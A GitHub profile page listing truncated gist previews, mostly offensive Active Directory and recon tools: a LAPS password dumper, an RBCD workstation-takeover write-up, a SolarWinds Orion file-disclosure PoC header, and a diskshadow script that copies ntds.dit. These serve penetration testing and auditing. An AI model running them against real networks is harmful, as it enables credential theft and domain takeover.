Skip to content

Instantly share code, notes, and snippets.

View seajaysec's full-sized avatar

Chris Farrell seajaysec

90 followers · 24 following
View GitHub Profile
@Flangvik
Flangvik / gist:3c02bae70e6d34d542783d07c8cbe584
Last active December 8, 2024 21:33
S4USelf_ZeroToHero.py
import sys
import os
import argparse
import getpass
import logging
import subprocess
import shlex
import base64
# Needs to PKINITtools have by @_dirkjan installed / be ran in the same directory
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@jstnkndy
jstnkndy / laps.py
Created August 6, 2021 15:02
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
import argparse
parser = argparse.ArgumentParser(description='Dump LAPS Passwords')
parser.add_argument('-u','--username', help='username for LDAP', required=True)
parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True)
parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False)
parser.add_argument('-d','--domain', help='Domain', required=True)
parser.add_argument('-t', '--target', help="Target Domain", required=False)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@luckytyphlosion
luckytyphlosion / all_radical_red_trainer_sets_out.txt
Last active July 12, 2022 20:56
Pokémon Radical Red 2.3a Trainer Data
Anything without IVs means 0 IVs straight, not perfect IVs.
Used the same script to dump Pokémon Clover trainers. The internal trainer format is actually documented at Skeli's CFRU repository, but I didn't feel like writing a separate dumper, so I repurposed the Clover Lua script (link: https://github.com/luckytyphlosion/PokemonBizhawkLua/tree/radical-red) (tested with Bizhawk 2.5.2).
Note: Pokémon Gender is incorrect (it just uses the gender of the trainer itself), but I was too bothered to fix it.
Some trainer sets have random abilities on mons, which are denoted by "or" on the Ability line when applicable (e.g. Intimidate or Moxie)
-------------------------------------------------------
@XargonWan
XargonWan / vmprep.sh
Last active February 3, 2021 17:00
351ELEC Toolchain - VMPREP
#!/bin/bash
# This is the VMPrep based on Ubuntu
# Just grab your favorite Vm (I used VirtualBox), install any ubuntu (I used lubuntu) and follow these instructions
# This is written as a script but I am not sure if it's working as an automated script: it should, but I haven't tested it yet.
touch ~/Desktop/351minal.sh
echo '#!/bin/bash' >> ~/Desktop/351minal.sh
echo 'sudo lxc-start 351elec' >> ~/Desktop/351minal.sh
echo 'sudo lxc-attach 351elec' >> ~/Desktop/351minal.sh
chmod +x ~/Desktop/351minal.sh
@nullenc0de
nullenc0de / breach.sh
Created January 27, 2021 15:06
Script will look up company assets and search them on greynoise.
cat cust.txt |assetfinder -subs-only | filter-resolved -c 100 | while read resolved; do host -t A "$resolved" | awk '{print $NF}' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'; done |sort -u |while read ip; do greynoise quick $ip ; done |grep -v "NOT" |cut -d ' ' -f1 |greynoise ip |sed -e '/malicious/,/rDNS/!d'
@0xsha
0xsha / Solarwinds_Orion_LFD.py
Last active September 24, 2024 05:28
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
@snovvcrash
snovvcrash / oaburl.py
Last active December 29, 2022 19:53
Send request to the MS Exchange Autodiscover service (MS-OXDSCLI protocol) and parse the response. Hunting for the OABUrl value. Credits to @ptswarm: https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/
#!/usr/bin/env python3
# Usage: python3 oaburl.py MEGACORP/j.doe:'Passw0rd!'@mx.example.com -e [email protected]
from xml.dom import minidom
from argparse import ArgumentParser
from getpass import getpass
import requests
@b1gbroth3r
b1gbroth3r / diskshadow.txt
Last active February 10, 2022 20:27
Automates retrieval of system hive & ntds.dit using diskshadow.exe for password auditing/hash cracking. Modify where necessary. Please verify that the Z: drive isn't already mapped on the DC before running this. Running unix2dos against the .txt and .cmd files wouldn't hurt either.
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec scriptfile.cmd
delete shadows volume %someAlias%
reset
exit